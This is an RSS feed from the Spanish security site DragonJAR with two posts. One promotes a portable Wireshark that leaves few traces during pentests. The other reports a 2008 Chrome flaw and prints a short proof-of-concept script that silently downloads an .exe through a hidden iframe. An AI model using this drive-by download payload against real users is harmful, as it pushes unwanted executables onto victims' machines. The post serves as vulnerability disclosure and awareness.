<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Ejecutables</title> <atom:link href="http://www.dragonjar.org/tag/ejecutables/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Wireshark Portable</title><link>http://www.dragonjar.org/wireshark-portable.xhtml</link> <comments>http://www.dragonjar.org/wireshark-portable.xhtml#comments</comments> <pubDate>Thu, 13 May 2010 01:34:31 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Auditoria]]></category> <category><![CDATA[Ejecutables]]></category> <category><![CDATA[Herramientas]]></category> <category><![CDATA[Memoria]]></category> <category><![CDATA[Portable]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Test de Penetración]]></category> <category><![CDATA[USB]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[Wireshark]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4253</guid> <description><![CDATA[Wireshark es una de esas herramientas que no pueden faltar a la hora de realizar un test de penetración, ya que mayoría de veces por las redes que se analizan pasan una gran cantidad de datos sin cifrar que ponen en riesgo la seguridad de la organización. El problema es que para utilizar Wireshark, es [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.dragonjar.org/tag/wireshark" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Wireshark">Wireshark</a> es una de esas <a
href="http://www.dragonjar.org/tag/herramientas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramientas">herramientas</a> que no pueden faltar a la hora de realizar un <a
href="http://www.dragonjar.org/tag/test-de-penetracion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Test de Penetración">test de penetración</a>, ya que mayoría de veces por las redes que se analizan pasan una gran cantidad de datos sin cifrar que  ponen en riesgo la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de la organización.</p><p
style="text-align: center;"><img
class="alignnone" title="Wireshark Portable" src="http://img248.imageshack.us/img248/6830/wireshark.jpg" alt="wireshark Wireshark Portable" width="333" height="152" /></p><p>El problema es que para utilizar Wireshark, es necesario instalar las librerías Wincap, lo cual necesariamente deja un rastro en el equipo utilizado, algo nada recomendable y algunas veces prohibido en este tipo de auditorias.<span
id="more-4253"></span></p><p>Existe una version <a
href="http://wiki.wireshark.org/WiresharkPortable">portable de Wireshark</a>, pero lo que hace es instalar las librerias Wincap y luego cuando se cierra, las desinstala, lo que claramente deja rastros en el equipo utilizado; Afortunadamente Adrián Puente, Ingeniero en Seguridad de sm4rt security services realizo una version de Wireshark realmente <a
href="http://www.dragonjar.org/tag/portable" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Portable">portable</a>, la cual no necesita instalar las librerias Wincap, se ejecuta sin problemas desde una <a
href="http://www.dragonjar.org/tag/memoria" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Memoria">memoria</a> <a
href="http://www.dragonjar.org/tag/usb" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con USB">USB</a> y deja la menor cantidad de rastro posible en la maquina.</p><p>Aunque cuenta con una versión un poco viejita de Wireshack, se puede modificar sin problemas para que corra con versiones mas actuales, solo reemplazando los <a
href="http://www.dragonjar.org/tag/ejecutables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecutables">ejecutables</a> de la aplicación.</p><h2 style="text-align: center;"><a
href="http://www.4shared.com/file/mmZKIMEK/Wireshark_Portable.html">Descargar Wireshark Portable para Windows</a></h2><p><strong>Mas Información:</strong><br
/> <a
href="http://hackarandas.com/blog/2009/10/08/truly-portable-wireshark/">Truly Portable Wireshark</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/backtrack-portable.xhtml" title="BackTrack Portable">BackTrack Portable</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-pentest.xhtml" title="¿Cómo se realiza un Pentest?">¿Cómo se realiza un Pentest?</a></li><li><a
href="http://www.dragonjar.org/laboratorios-de-seguridad-informatica.xhtml" title="Laboratorios de Seguridad Informática">Laboratorios de Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/hackarmoury-herramientas-de-seguridad-siempre-disponibles.xhtml" title="HackArmoury herramientas de seguridad siempre disponibles">HackArmoury herramientas de seguridad siempre disponibles</a></li><li><a
href="http://www.dragonjar.org/nuestros-retos-forenses.xhtml" title="Nuestros Retos Forenses">Nuestros Retos Forenses</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/wireshark-portable.xhtml/feed</wfw:commentRss> <slash:comments>9</slash:comments> </item> <item><title>Muy Bonito, Muy de la Casa, MUY INSEGURO</title><link>http://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml</link> <comments>http://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml#comments</comments> <pubDate>Thu, 04 Sep 2008 06:12:12 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Archivos]]></category> <category><![CDATA[Descargar]]></category> <category><![CDATA[Ejecutables]]></category> <category><![CDATA[Google]]></category> <category><![CDATA[Google Chrome]]></category> <category><![CDATA[Navegador]]></category> <category><![CDATA[Vulnerabilidad]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1180</guid> <description><![CDATA[El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones &#8220;WoW&#8221; pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento [...]]]></description> <content:encoded><![CDATA[<p>El Nuevo <a
href="http://www.dragonjar.org/tag/navegador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Navegador">Navegador</a> de <a
href="http://www.dragonjar.org/tag/google" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Google">Google</a> puede ser muy rápido, muy bonito, consumir poca <a
href="http://www.dragonjar.org/tag/memoria" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Memoria">memoria</a>, tener muchas funciones &#8220;WoW&#8221; pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de <a
rel="external nofollow" href="../primera-vulnerabilidad-en-google-chrome.xhtml#comment-316">exactlimon</a> sobre un nuevo fallo en <a
href="http://www.dragonjar.org/tag/google-chrome" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Google Chrome">Google Chrome</a> que permite <a
href="http://www.dragonjar.org/tag/descargar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Descargar">descargar</a> <a
href="http://www.dragonjar.org/tag/archivos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Archivos">archivos</a> (de cualquier tipo) sin el consentimiento del usuario.</p><p>Este fallo descubierto <strong>nerex </strong>y publicado en <a
href="http://milw0rm.com/exploits/6355">milw0rm.com</a> consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.</p><pre>&lt;script&gt;
document.write('&lt;iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0"&gt;');
&lt;/script&gt;</pre><p>He subido una prueba de concepto al servidor con la calculadora de <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a> y  <a
href="http://www.dragonjar.org/chrome.html">haciendo click aquí </a>obtendrás algo parecido a esto.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img373.imageshack.us/img373/3143/chrome2nk7.jpg" alt="chrome2nk7 Muy Bonito, Muy de la Casa, MUY INSEGURO"  title="Muy Bonito, Muy de la Casa, MUY INSEGURO" /></p><p>El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por &#8220;curiosidad&#8221;, <span
style="text-decoration: line-through;">al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal</span> actualizado, han vuelto a promocionarlo en la pagina principal de google.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img50.imageshack.us/img50/7016/chromejg9.jpg" alt="chromejg9 Muy Bonito, Muy de la Casa, MUY INSEGURO"  title="Muy Bonito, Muy de la Casa, MUY INSEGURO" /></p><p>La version afectada con este y los otros <a
href="http://www.dragonjar.org/primera-vulnerabilidad-en-google-chrome.xhtml">fallos de seguridad</a> <a
href="http://www.dragonjar.org/nueva-vulnerabilidad-en-google-chrome.xhtml">mencionados anteriormente</a> en el portal es la <strong>0.2.149.27</strong> les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://milw0rm.com/exploits/6355"> http://milw0rm.com/exploits/6355</a><br
/> <a
title="Enlace permanente a Primera Vulnerabilidad en Google Chrome" rel="bookmark" href="../primera-vulnerabilidad-en-google-chrome.xhtml">Primera Vulnerabilidad en Google Chrome </a><br
/> <a
title="Nueva Vulnerabilidad en Google Chrome" href="../nueva-vulnerabilidad-en-google-chrome.xhtml">Nueva Vulnerabilidad en Google Chrome</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/nueva-vulnerabilidad-en-google-chrome.xhtml" title="Nueva Vulnerabilidad en Google Chrome">Nueva Vulnerabilidad en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/primera-vulnerabilidad-en-google-chrome.xhtml" title="Primera Vulnerabilidad en Google Chrome">Primera Vulnerabilidad en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad">Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/0day-en-google-chrome.xhtml" title="0day en Google Chrome">0day en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/google-chrome-podria-dejar-de-ser-el-navegador-mas-seguro.xhtml" title="Google Chrome podría dejar de ser el Navegador más Seguro">Google Chrome podría dejar de ser el Navegador más Seguro</a></li><li><a
href="http://www.dragonjar.org/el-navegador-mas-seguro.xhtml" title="&#8220;Crean&#8221; un navegador pensando en su seguridad">&#8220;Crean&#8221; un navegador pensando en su seguridad</a></li><li><a
href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml/feed</wfw:commentRss> <slash:comments>16</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 8/34 queries in 0.057 seconds using disk: basic
Object Caching 997/1036 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 23:59:44 -->
